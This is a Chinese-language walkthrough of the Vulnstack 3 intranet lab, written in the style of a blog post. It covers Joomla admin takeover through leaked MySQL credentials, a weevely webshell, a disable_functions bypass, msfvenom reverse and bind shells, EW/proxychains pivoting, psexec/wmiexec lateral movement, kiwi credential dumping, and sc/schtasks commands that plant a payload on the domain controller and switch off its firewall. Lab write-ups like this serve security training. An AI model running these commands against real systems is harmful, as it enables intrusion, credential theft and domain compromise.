Vulnstack內網靶場3

Vulnstack內網靶場3 (qiyuanxuetang.net)

環境配置

打開虛擬機鏡像為掛起狀態，第一時間進行快照，部分服務未做自啟，重啟后無法自動運行。

掛起狀態，賬號已默認登陸，centos為出網機，第一次運行，需重新獲取橋接模式網卡ip。

除重新獲取ip，不建議進行任何虛擬機操作。

添加一個網絡，配置如下，該網絡為內部網絡

目標：域控中存在一份重要文件。

本次環境為黑盒測試，不提供虛擬機賬號密碼。

 

 kali 攻擊機ip 192.168.1.64

 

外網主機信息收集　

nmap -sV -A -O 192.168.1.110

 22、80、3306，先看看80端口

wappalyzer插件看到CMS是Joomla，之前我接觸過這個CMS，直接利用joomscan開掃

joomscan -u 192.168.1.110  

 版本號3.9.12，搜了一下這個版本的漏洞，暫時只看到了XSS， 后台登陸界面，還有一個看樣子像是信息泄露

 

打開信息泄露的界面，這里泄露出了mysqli的賬號密碼

 

 testuser：cvcvgjASD!@

 

getwebshell

 登陸mysql

mysql -h 192.168.1.110 -u testuser -p

joomla數據庫

注意到一些叫user的表

最終在user表中找到了賬號密碼，但是密碼是加密的

 試了一下john，也掃不出來

無奈之下查了一下，發現原來官方有自帶忘記密碼后如何登陸后台的解決方法如何恢復或重置管理員密碼？ - Joomla! Documentation

INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');

 上面的例子更改密碼為“secret”

進入到剛剛掃到的后台界面，登陸　

 

 

 進入后台之后 接下來的操作就是編輯界面寫入后門，然后getshell

 之前我在DC3靶機上做過joomla的滲透很快找到了后台編輯頁面

 

 

 創建了一個php文件，寫入木馬（注意php文件的路徑為http://192.168.1.110/templates/beez3/shell.php）

我首先試了一下用msf的木馬，但是發現不能連接，然后我再試了一下weevely的木馬才能連接的上

weevely generate test test.php   //生成木馬，連接密碼為test
weevely http://192.168.1.110/templates/beez3/shell.php test  \\連接木馬文件

有點好奇為什么msf不能連接，因為我之前的靶機試過是可以的，網上查了一下，好像是因為設置了disable_functions，被禁用了一些危險的函數

然而雖然weevely連上了，但是很多命令都不能用，所以基本沒有用，還得尋找一些繞過disable_functions的方法，查看了一下版本號

 

 找到了一個php腳本可以直接繞過執行系統命令github.com

上傳上去

然后發送如下POST請求：

POST: cmd=<command>// <command>為你要執行的系統命令

 但是也只是能執行系統命令，后來看到蟻劍有一個插件可以直接繞過disable_function，就去kali裝了蟻劍試試看

windows,linux 蟻劍下載與安裝 與 手動安裝插件disable_functions_Sk1y的博客-CSDN博客

可以看到連接了蟻劍之后也是不能執行系統命令

 

加載插件后，直接可以執行命令，真強

 蟻劍上傳一個msf的linux后門，反彈到msf

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.64 LPORT=4444 -f elf > shell.elf

　msf監聽，這里直接獲取到了root權限　

 但是我用蟻劍查看網絡，發現明明是同一個shell，為什么兩邊的網絡配置卻不一樣

 系統也不一樣，有點奇怪

 

 查了一下應該是nigx反向代理，將處於內網的Ubuntu（192.168.93.120）代理到了CentOS（192.168.1.110）上。這就解釋了為什么我上傳后門，卻返回了完全不同的shell，這個msf返回的shell才是真正對外的主機

　　

內網滲透

前面獲取了內網的網段192.168.93.0/24　　

接下來添加路由將msf帶進內網

通過background回到msf，使用route增加對應路由，4是sessions值

route add 192.168.93.0 255.255.255.0 4

查看是否設置成功

這樣msf就能掃描到內網的主機了

或者使用ew代理和proxychains4將整個kali帶入內網

首先將EW上傳

在攻擊機運行

./ew_for_linux64 -s rcsocks -l 1080 -e 4444

 這條命令的意思是在公網VPS上添加一個轉接隧道，把1080端口收到的代理請求轉發給4444端口　　

然后在web主機運行

ew_for_Win.exe -s rssocks -d 192.168.200.6 -e 4444

這條命令的意思是在本機服務器上啟動SOCKS5服務，然后反彈到192.168.200.6攻擊機的4444端口

運行完后會顯示連接OK，現在就可以通過訪問攻擊機的1080端口，使用win7的服務器上SOCKS5代理服務

接下來使用proxychains添加代理（KALI中自帶）

輸入打開proxychains進行編輯

vi /etc/proxychains4.conf

 首先將dynamic_chain前面的注釋符#刪除

 然后在底部改成內容 socks5 127.0.0.1 1080

保存並退出，現在kali可以訪問內網了

setg Proxies socks5:127.0.0.1:1080 ，把msf代理進內網

 使用msf掃描內網主機和端口

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.93.0/24
set threads 100
run

還掃到了三個主機分別為10、20、30 

或者可以使用smb掃描

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.1/24
run

　這種方式可以直接獲取主機名和域名　

既然開放了445端口，嘗試一下永恆之藍攻擊，但是都失敗了

 那我能想到的只剩下最后一種方法，爆破密碼了

使用 use auxiliary/scanner/smb/smb_login

但是基本上能用的字典都用了，沒有跑出來

 

到了這里我已經沒有頭緒了，查看wp發現居然是要用之前的mysql的密碼來遠程登陸192.168.93.20:1433 mssql的數據庫，實在沒想到。。並且后面根據mssql低權限獲取ntlmv2 hash的操作目前我也不了解，解法還有很多

Vlunstack ATT&CK實戰系列——紅隊實戰（三）Writeup - 先知社區 (aliyun.com)

ATT&CK實戰系列-紅隊評估 （三）Vulnstack靶場內網域滲透 (qq.com)

還是用別人的字典跑出來了administrator的密碼是123qwe!ASD

 

impacket工具包

 獲得了密碼，使用psexec從linux向windows進行橫向移動

proxychains psexec.py 'administrator:123qwe!ASD@192.168.93.30'

 獲取到了win2008和win7的權限，域控的權限暫時沒有獲取到，但是這個shell很快就會沒

使用wmiexec的shell比較穩定Psexec和wmiexec的原理和區別 - 我要變超人 - 博客園 (cnblogs.com)

proxychains wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'

使用smbclient通過代理連接windows server 2008 上傳一個正向后門

msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o shell.exe

proxychains smbclient //192.168.93.20/C$ -U administrator

接着在剛剛獲取的權限上運行后門

 

msf監聽獲取shell

getsystem
load kiwi
creds_all

 

抓取到了域管理員的密碼，接下來就可以進行ipc連接攻擊域控了

獲取域控

輸入shell進入終端，連接域控上傳木馬創建定時任務

net use \\192.168.93.10\ipc$ "zxcASDqw123!!" /user:administrator
copy c:\shell.exe \\192.168.93.10\c$
schtasks /create /s 192.168.93.10 /tn test /sc once /st 10:05 /tr C:\shell.exe /ru system /f

 創建失敗，訪問被拒

使用psexec模塊也不行

use exploit/windows/smb/psexec
set rhosts 192.168.93.10
set SMBDomain TEST
set SMBUser administrator
set SMBPass zxcASDqw123!!
set payload windows/meterpreter/bind_tcp
run

　

但是使用impacket工具包中的psexec可以

 還看到一種方法，ipc連接后遠程關閉域控的防火牆，然后在使用msf的psexec模塊即可

sc \\192.168.93.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.10 start unablefirewall

　機密文件